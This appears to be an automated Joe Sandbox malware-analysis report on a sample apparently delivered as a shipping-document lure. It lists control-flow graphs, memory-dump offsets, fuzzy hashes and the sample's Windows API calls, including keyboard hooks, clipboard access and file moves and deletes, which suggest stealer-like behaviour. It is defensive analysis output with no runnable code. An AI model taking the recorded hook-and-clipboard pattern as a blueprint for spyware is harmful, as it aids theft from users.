                                    • Opcode Fuzzy Hash: 1edfcb86390d18c8b0b3c8555d6bb492182742fe1ea4e2011b03415b8524fdf5
                                    • Instruction Fuzzy Hash: 875147B4900749CFDB54DFAAD948BDEBBF1EB49314F208419E009A7360D778A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 353 63d8cc8-63d8ced 354 63d8cef-63d8cf2 353->354 355 63d8cf8-63d8d0d 354->355 356 63d95b0-63d95b3 354->356 363 63d8d0f-63d8d15 355->363 364 63d8d25-63d8d3b 355->364 357 63d95d9-63d95db 356->357 358 63d95b5-63d95d4 356->358 359 63d95dd 357->359 360 63d95e2-63d95e5 357->360 358->357 359->360 360->354 362 63d95eb-63d95f5 360->362 366 63d8d19-63d8d1b 363->366 367 63d8d17 363->367 371 63d8d46-63d8d48 364->371 366->364 367->364 372 63d8d4a-63d8d50 371->372 373 63d8d60-63d8dd1 371->373 374 63d8d54-63d8d56 372->374 375 63d8d52 372->375 384 63d8dfd-63d8e19 373->384 385 63d8dd3-63d8df6 373->385 374->373 375->373 390 63d8e1b-63d8e3e 384->390 391 63d8e45-63d8e60 384->391 385->384 390->391 396 63d8e8b-63d8ea6 391->396 397 63d8e62-63d8e84 391->397 402 63d8ea8-63d8ec4 396->402 403 63d8ecb-63d8ed9 396->403 397->396 402->403 404 63d8ee9-63d8f63 403->404 405 63d8edb-63d8ee4 403->405 411 63d8f65-63d8f83 404->411 412 63d8fb0-63d8fc5 404->412 405->362 416 63d8f9f-63d8fae 411->416 417 63d8f85-63d8f94 411->417 412->356 416->411 416->412 417->416
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: 97b025237f8e184411130934630d71e3a3709718efd5da14316eaf6dad1ea214
                                    • Instruction ID: 69a3db34e67a594be041999a1e7b7034a9c5150fd9d8536153d63ce2e46bf931
                                    • Opcode Fuzzy Hash: 97b025237f8e184411130934630d71e3a3709718efd5da14316eaf6dad1ea214
                                    • Instruction Fuzzy Hash: 39916035F0021A8FCB64DF65D9907AFB3F6AF85240F10846AD509AB398EB34ED45CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 680 63d4718-63d473c 681 63d473e-63d4741 680->681 682 63d4747-63d483f 681->682 683 63d4e20-63d4e23 681->683 703 63d4845-63d4892 call 63d4fc0 682->703 704 63d48c2-63d48c9 682->704 684 63d4e25-63d4e3f 683->684 685 63d4e44-63d4e46 683->685 684->685 686 63d4e4d-63d4e50 685->686 687 63d4e48 685->687 686->681 689 63d4e56-63d4e63 686->689 687->686 717 63d4898-63d48b4 703->717 705 63d494d-63d4956 704->705 706 63d48cf-63d493f 704->706 705->689 723 63d494a 706->723 724 63d4941 706->724 720 63d48bf 717->720 721 63d48b6 717->721 720->704 721->720 723->705 724->723
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fpq$XPpq$\Opq
                                    • API String ID: 0-2571271785
                                    • Opcode ID: bbd34a74f57a18a0de0ba0bc7f6804ffa8f05f6e4cead62ed269531c4525b715
                                    • Instruction ID: 3f50cc71153487ba6267cb9c180ef5d8d9ef1cb5bc693774e4964b2f038ed009
                                    • Opcode Fuzzy Hash: bbd34a74f57a18a0de0ba0bc7f6804ffa8f05f6e4cead62ed269531c4525b715
                                    • Instruction Fuzzy Hash: 9F619235F002099FEF549FA5D8147AEBBF6FF89300F208029E506AB396DB759C458B90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1389 63d8cb7-63d8cc0 1391 63d8d29-63d8d3b 1389->1391 1392 63d8cc2-63d8ced 1389->1392 1400 63d8d46-63d8d48 1391->1400 1394 63d8cef-63d8cf2 1392->1394 1396 63d8cf8-63d8d00 1394->1396 1397 63d95b0-63d95b3 1394->1397 1403 63d8d0b-63d8d0d 1396->1403 1398 63d95d9-63d95db 1397->1398 1399 63d95b5-63d95d4 1397->1399 1401 63d95dd 1398->1401 1402 63d95e2-63d95e5 1398->1402 1399->1398 1404 63d8d4a-63d8d50 1400->1404 1405 63d8d60-63d8dd1 1400->1405 1401->1402 1402->1394 1406 63d95eb-63d95f5 1402->1406 1407 63d8d0f-63d8d15 1403->1407 1408 63d8d25-63d8d28 1403->1408 1410 63d8d54-63d8d56 1404->1410 1411 63d8d52 1404->1411 1423 63d8dfd-63d8e19 1405->1423 1424 63d8dd3-63d8df6 1405->1424 1413 63d8d19-63d8d1b 1407->1413 1414 63d8d17 1407->1414 1408->1391 1410->1405 1411->1405 1413->1408 1414->1408 1429 63d8e1b-63d8e3e 1423->1429 1430 63d8e45-63d8e60 1423->1430 1424->1423 1429->1430 1435 63d8e8b-63d8ea6 1430->1435 1436 63d8e62-63d8e84 1430->1436 1441 63d8ea8-63d8ec4 1435->1441 1442 63d8ecb-63d8ed9 1435->1442 1436->1435 1441->1442 1443 63d8ee9-63d8f63 1442->1443 1444 63d8edb-63d8ee4 1442->1444 1450 63d8f65-63d8f83 1443->1450 1451 63d8fb0-63d8fc5 1443->1451 1444->1406 1455 63d8f9f-63d8fae 1450->1455 1456 63d8f85-63d8f94 1450->1456 1451->1397 1455->1450 1455->1451 1456->1455
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq
                                    • API String ID: 0-3550614674
                                    • Opcode ID: 481a790f06ca3d91de8fba1fe8eee080208dfd578820e46a3f0b1d75be24325b
                                    • Instruction ID: d0eb417e06f12a89a5fee8e27bb6c5934a648fcc4844dab2fe8e96d43db5cc51
                                    • Opcode Fuzzy Hash: 481a790f06ca3d91de8fba1fe8eee080208dfd578820e46a3f0b1d75be24325b
                                    • Instruction Fuzzy Hash: B6514035B001098FDBA4EF75D990BAF73F6EB85640F10846AC5069B398EB35EC02CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1521 637328d-63732fe 1523 6373300-6373306 1521->1523 1524 6373309-6373310 1521->1524 1523->1524 1525 6373312-6373318 1524->1525 1526 637331b-6373353 1524->1526 1525->1526 1527 637335b-63733ba CreateWindowExW 1526->1527 1528 63733c3-63733fb 1527->1528 1529 63733bc-63733c2 1527->1529 1533 63733fd-6373400 1528->1533 1534 6373408 1528->1534 1529->1528 1533->1534 1535 6373409 1534->1535 1535->1535
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 063733AA
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 8dfc45e13d81807ec659108bf2d5a399be189702bb1ae1c5d46c3265c854aa31
                                    • Instruction ID: 6f714554f1977191490274373a1d8323961d3c7eaf9849c7a02f71b3f3b27074
                                    • Opcode Fuzzy Hash: 8dfc45e13d81807ec659108bf2d5a399be189702bb1ae1c5d46c3265c854aa31
                                    • Instruction Fuzzy Hash: 6F51C0B5D00319AFEB24CF99C984ADEBBB5BF48310F24812AE419AB210D7759985CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1536 6373298-63732fe 1537 6373300-6373306 1536->1537 1538 6373309-6373310 1536->1538 1537->1538 1539 6373312-6373318 1538->1539 1540 637331b-63733ba CreateWindowExW 1538->1540 1539->1540 1542 63733c3-63733fb 1540->1542 1543 63733bc-63733c2 1540->1543 1547 63733fd-6373400 1542->1547 1548 6373408 1542->1548 1543->1542 1547->1548 1549 6373409 1548->1549 1549->1549
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 063733AA
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: b763641a07d02e559a9c8c46d6c4ea74cc4b6aae75818224ed8dbed1d1c6476c
                                    • Instruction ID: ff2ecca33f1a70e28f81a22c480d937f84a969af16a3cb006aa45574f9d920b6
                                    • Opcode Fuzzy Hash: b763641a07d02e559a9c8c46d6c4ea74cc4b6aae75818224ed8dbed1d1c6476c
                                    • Instruction Fuzzy Hash: 6941B0B5D00319DFEB24CF9AC984ADEBBB5FF48310F24812AE419AB250D7759885CF90
                                    APIs
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06377CC9
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: CallProcWindow
                                    • String ID:
                                    • API String ID: 2714655100-0
                                    • Opcode ID: f72f68e04230f15622902f49347a2f97ea18d38fd79add1e0b3bd67b36bd0e89
                                    • Instruction ID: 832f3de8a89f2bb70b1d3465ecb0355526785b70bf42baaf7a45a7f0038f9d19
                                    • Opcode Fuzzy Hash: f72f68e04230f15622902f49347a2f97ea18d38fd79add1e0b3bd67b36bd0e89
                                    • Instruction Fuzzy Hash: 8D4117B9A00305CFDB54CF99C488AAABBF5FF88314F24C859D519AB321D774A845CFA4
                                    APIs
                                    • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00D086C0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: FileMove
                                    • String ID:
                                    • API String ID: 3562171763-0
                                    • Opcode ID: 1b69a917fbf3a720a568ede8f29b36df02a485248d9f5a930b968b980c0ceedc
                                    • Instruction ID: b4c8e6237f24d8031a5ae56340ee7c86419b854c5576cb6b9de46dfe5d0bfb29
                                    • Opcode Fuzzy Hash: 1b69a917fbf3a720a568ede8f29b36df02a485248d9f5a930b968b980c0ceedc
                                    • Instruction Fuzzy Hash: A1319EB5C053489FCB00CF99D844ADEBFF0FF49320F19805AD858AB296D7755944CBA5
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Clipboard
                                    • String ID:
                                    • API String ID: 220874293-0
                                    • Opcode ID: 8cd69605670f73297e7480c6f62e86e0ba01aea57994fdc2439d25d90f171f2b
                                    • Instruction ID: 2c586953000e562074ddbce3a13276c3cd03e4198ee0921f3e35ff4b2e588a70
                                    • Opcode Fuzzy Hash: 8cd69605670f73297e7480c6f62e86e0ba01aea57994fdc2439d25d90f171f2b
                                    • Instruction Fuzzy Hash: 493114B0D01249DFDB60CF99C984BCEBBF5AB48304F248069E408BB294DB786845CBA5
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Clipboard
                                    • String ID:
                                    • API String ID: 220874293-0
                                    • Opcode ID: 2ef37de9c5a0246365e728aa461ff180056ed7a2ca035ae665d7eb2f1c609ff9
                                    • Instruction ID: 991403f33218604b7ab85d1d973bee828a8596900947da33b528674e02b7a702
                                    • Opcode Fuzzy Hash: 2ef37de9c5a0246365e728aa461ff180056ed7a2ca035ae665d7eb2f1c609ff9
                                    • Instruction Fuzzy Hash: 5431E2B0D01209DFDB64CF99C988B8EBBF5AB48314F248069E408BB294DB746845CBA5
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06376DF7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: b9e9031f80076a330917f2e1c56dac9c8d8a89aaac20d67e47fa0316e1cc7e8e
                                    • Instruction ID: 4d0782f9471a2bbeff9d57bd34975e9846f675e0ac81d46e12370ccac1f22547
                                    • Opcode Fuzzy Hash: b9e9031f80076a330917f2e1c56dac9c8d8a89aaac20d67e47fa0316e1cc7e8e
                                    • Instruction Fuzzy Hash: 4B2119B5D00248EFDB10CF99D984ADEBFF9EB48310F14801AE954A3310D374A944CFA4
                                    APIs
                                    • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00D086C0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: FileMove
                                    • String ID:
                                    • API String ID: 3562171763-0
                                    • Opcode ID: ef0fc1be8150f5ea7ec9799055adc9bb3a5dd607e5dc4a701799a3611498d289
                                    • Instruction ID: 7f5190a468924beda5f208d52bd057a658c90f2c75d80cd0142b6e9a3a108165
                                    • Opcode Fuzzy Hash: ef0fc1be8150f5ea7ec9799055adc9bb3a5dd607e5dc4a701799a3611498d289
                                    • Instruction Fuzzy Hash: 8B2124B6C012089FCB10CF99E484ADEFFB1FB88310F24815AE858AB345C7759A45CFA4
                                    APIs
                                    • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00D086C0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: FileMove
                                    • String ID:
                                    • API String ID: 3562171763-0
                                    • Opcode ID: 4e2c0b7e0e679faf9e54456c45cf461d7e76e5ac8de173887f5c03b49db8ce63
                                    • Instruction ID: ba5d052dc98ac04c9208fbec84acdd0695b836137f6bd101c6b951787b86da59
                                    • Opcode Fuzzy Hash: 4e2c0b7e0e679faf9e54456c45cf461d7e76e5ac8de173887f5c03b49db8ce63
                                    • Instruction Fuzzy Hash: C02124B6C012189FCB10CF99D884BDEBBF5FB88310F25805AE858AB344D7759940CBA4
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06376DF7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 3cafb5820d48655c6f88b47ab106aab66212008196bbbffcab313fd27f210063
                                    • Instruction ID: 5ba93e3103bbb976e93e46a43087b09166ad11b5c12667cd7ff72ae9aa42e317
                                    • Opcode Fuzzy Hash: 3cafb5820d48655c6f88b47ab106aab66212008196bbbffcab313fd27f210063
                                    • Instruction Fuzzy Hash: 7321E4B5D00258DFDB10CF9AD984ADEBFF9EB48320F14841AE918A7350D378A944CFA4
                                    APIs
                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0637A78B
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: HookWindows
                                    • String ID:
                                    • API String ID: 2559412058-0
                                    • Opcode ID: a84f7f854beaf467f98a72c5798093e2890d827db4cc7d155599238536a107f5
                                    • Instruction ID: 34f318ac4fc22333621d1e8ff9073e55017de5acf3295d1c14ade152f3eb4876
                                    • Opcode Fuzzy Hash: a84f7f854beaf467f98a72c5798093e2890d827db4cc7d155599238536a107f5
                                    • Instruction Fuzzy Hash: E02149B5D002499FCB14CFA9C944BEEFBF5EF88320F10842AD499A7250C774A944CFA4
                                    APIs
                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06378315), ref: 0637839F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: CallbackDispatcherUser
                                    • String ID:
                                    • API String ID: 2492992576-0
                                    • Opcode ID: 2c46dd49e6c2969634e2b0f01f9a35612175017ac47136a530b50bd609fff46b
                                    • Instruction ID: d5765bb1b2c5552186bf93d69d4363c31b01514bd81053c2382856e01b009609
                                    • Opcode Fuzzy Hash: 2c46dd49e6c2969634e2b0f01f9a35612175017ac47136a530b50bd609fff46b
                                    • Instruction Fuzzy Hash: FC219DB58053988FCB11DFADC8947DEBFF4AF4A310F10409AD494A7251D278A848CFA9
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06372256
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 2534b46bbd368eb9dac8febfd787804c35661652a92765d563d70ffd37f53974
                                    • Instruction ID: 0dd6d9a96e66a745391c1907c5f16cc39c80d3c499f9c53df743e72b4210debf
                                    • Opcode Fuzzy Hash: 2534b46bbd368eb9dac8febfd787804c35661652a92765d563d70ffd37f53974
                                    • Instruction Fuzzy Hash: B3215EB5C053888FCB11CFAAC444ACEFFF4EF4A210F14859AD458A7252C378A549CFA1
                                    APIs
                                    • DeleteFileW.KERNELBASE(00000000), ref: 00D080D0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: 6ebea1823454aa28dc7f8df4887df501ac1e46fce4313e2509e09dd8ac306a1b
                                    • Instruction ID: 4e3e9bc2e0b344e3acef7130c232f4c9c0d7aca91188a4c8207052d14a877dad
                                    • Opcode Fuzzy Hash: 6ebea1823454aa28dc7f8df4887df501ac1e46fce4313e2509e09dd8ac306a1b
                                    • Instruction Fuzzy Hash: C32144B1C006599FCB20CFAAD444BEEFBB0AB48320F14812AD858B7241D778A945CFA4
                                    APIs
                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0637A78B
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: HookWindows
                                    • String ID:
                                    • API String ID: 2559412058-0
                                    • Opcode ID: b332219e03ab7132b99e806f4b6d3541952a74040980f3ba2f3c1ad7211fcbce
                                    • Instruction ID: 3eda044ee69a0e83636471fd8dcb38a4c79ab553089ec26b319728e64febd8ee
                                    • Opcode Fuzzy Hash: b332219e03ab7132b99e806f4b6d3541952a74040980f3ba2f3c1ad7211fcbce
                                    • Instruction Fuzzy Hash: 5B2127B5D002499FCB14CF99C944BDEFBF5EB88320F10842AD459A7250C774A944CFA5
                                    APIs
                                    • DeleteFileW.KERNELBASE(00000000), ref: 00D080D0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: 54d2dc6d17d5c3c0d69f0710ba7ce1ca2f21a423ed653fab815be49ab2dc2f30
                                    • Instruction ID: 46098de9a79c192606da6bdc14bb25f4c095ee53fcb1da41e2147a21ec5f6827
                                    • Opcode Fuzzy Hash: 54d2dc6d17d5c3c0d69f0710ba7ce1ca2f21a423ed653fab815be49ab2dc2f30
                                    • Instruction Fuzzy Hash: 631103B5C0066A9BCB14CF9AD544B9EFBB4BB48320F14812AD858A7390D778A944CFA5
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 00D0F47F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
                                    • Opcode ID: c7873cdc98f0b5ca75172fbc10b900162357da5ae104584b0f44e20b63738351
                                    • Instruction ID: 6a638fbddfaf68fd950556b5f2e5ded50f31b7fc2ec4c1bcd5deb21fcc88c4ca
                                    • Opcode Fuzzy Hash: c7873cdc98f0b5ca75172fbc10b900162357da5ae104584b0f44e20b63738351
                                    • Instruction Fuzzy Hash: B11114B1C006699BCB20CF9AD444BDEFBF4AB48320F14812AE818B7250D778A941CFA5
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 00D0F47F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
                                    • Opcode ID: d36070200c0175a47f94957adaf6581f66a5a2514366613b033c3e08d292d8ae
                                    • Instruction ID: a558d1f2e3c219893c1c770161ea6adedd9ba36517f33d7c80727ef25713d143
                                    • Opcode Fuzzy Hash: d36070200c0175a47f94957adaf6581f66a5a2514366613b033c3e08d292d8ae
                                    • Instruction Fuzzy Hash: 8711F3B1C006699BCB10DF9AC544BDEFBF4EF48320F24816AD818A7251D378A945CFA5
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06372256
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 1349a2e94ca4321877c0c3edf29c27b60cb318c4a34ee47f692fc2bb281be17b
                                    • Instruction ID: 38805123d1bff7df87a447f01332c3902f057200715954081c564adcc82a91f9
                                    • Opcode Fuzzy Hash: 1349a2e94ca4321877c0c3edf29c27b60cb318c4a34ee47f692fc2bb281be17b
                                    • Instruction Fuzzy Hash: 561132B6C002498FCB20DF9AC444BDEFBF4EB89220F10842AD429B7210D379A645CFA5
                                    APIs
                                    • OleInitialize.OLE32(00000000), ref: 0637885D
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Initialize
                                    • String ID:
                                    • API String ID: 2538663250-0
                                    • Opcode ID: 08d51f138a6d2ae3d0385e7c445852a6e3a9edeaa6663958ccba91851d73563b
                                    • Instruction ID: 51f9ce4eb1142ca1756eac078c510ba81f00439a3a83f792767db22f663bbc78
                                    • Opcode Fuzzy Hash: 08d51f138a6d2ae3d0385e7c445852a6e3a9edeaa6663958ccba91851d73563b
                                    • Instruction Fuzzy Hash: D01115B59003589FCB20DF9AD448BDEBBF4EB48324F208469D519A7310D378A944CFA5
                                    APIs
                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06378315), ref: 0637839F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: CallbackDispatcherUser
                                    • String ID:
                                    • API String ID: 2492992576-0
                                    • Opcode ID: fd5656d29f483bd08911a17fa55c289b571752cefbfed700baec5a0aa72f14b5
                                    • Instruction ID: 093b3b3e12719e9a397babae47853dc9bb628342289ec9bd63f1f6fc7ce37a5e
                                    • Opcode Fuzzy Hash: fd5656d29f483bd08911a17fa55c289b571752cefbfed700baec5a0aa72f14b5
                                    • Instruction Fuzzy Hash: E41136B5800248CFDB60DF9AC848BDEFBF4EB48320F208429D519A7250D378A944CFA5
                                    APIs
                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06378315), ref: 0637839F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: CallbackDispatcherUser
                                    • String ID:
                                    • API String ID: 2492992576-0
                                    • Opcode ID: 430c37e9c5fcf9bd5a3b841143e1c24fd4ffa13c6efd62d9237aeb5b06d89ec5
                                    • Instruction ID: cd4f75b1f0e7996219efbcbc38129950a21bcb782a2631d1cb3713c5732ddbf3
                                    • Opcode Fuzzy Hash: 430c37e9c5fcf9bd5a3b841143e1c24fd4ffa13c6efd62d9237aeb5b06d89ec5
                                    • Instruction Fuzzy Hash: 701136B5800249CFCB20CF9AD848BDEFFF4AB49324F20845AD459A3250D374A544CFA5
                                    APIs
                                    • OleInitialize.OLE32(00000000), ref: 0637885D
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID: Initialize
                                    • String ID:
                                    • API String ID: 2538663250-0
                                    • Opcode ID: 493434dd6c3c62c8b517168c89c96826202b0aa74a27c37915868cd075e14024
                                    • Instruction ID: 2d1d68edff5750b74ff7d40c7cebab0b379969f69b2f7179d4027426c9c43d5a
                                    • Opcode Fuzzy Hash: 493434dd6c3c62c8b517168c89c96826202b0aa74a27c37915868cd075e14024
                                    • Instruction Fuzzy Hash: 421145B4900249CFCB20DFA9D488BCEFFF4AB48320F14846AE459A7211D378A584CFA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XPpq
                                    • API String ID: 0-1266478781
                                    • Opcode ID: 253b309b333b88afc490fd87cdb33616c4d56b70b25434a3003b6dcdb011510f
                                    • Instruction ID: 28cc0b5e688cefd73f62ef7c82e0fc68feecfe76958bd40025157cd26903ce4a
                                    • Opcode Fuzzy Hash: 253b309b333b88afc490fd87cdb33616c4d56b70b25434a3003b6dcdb011510f
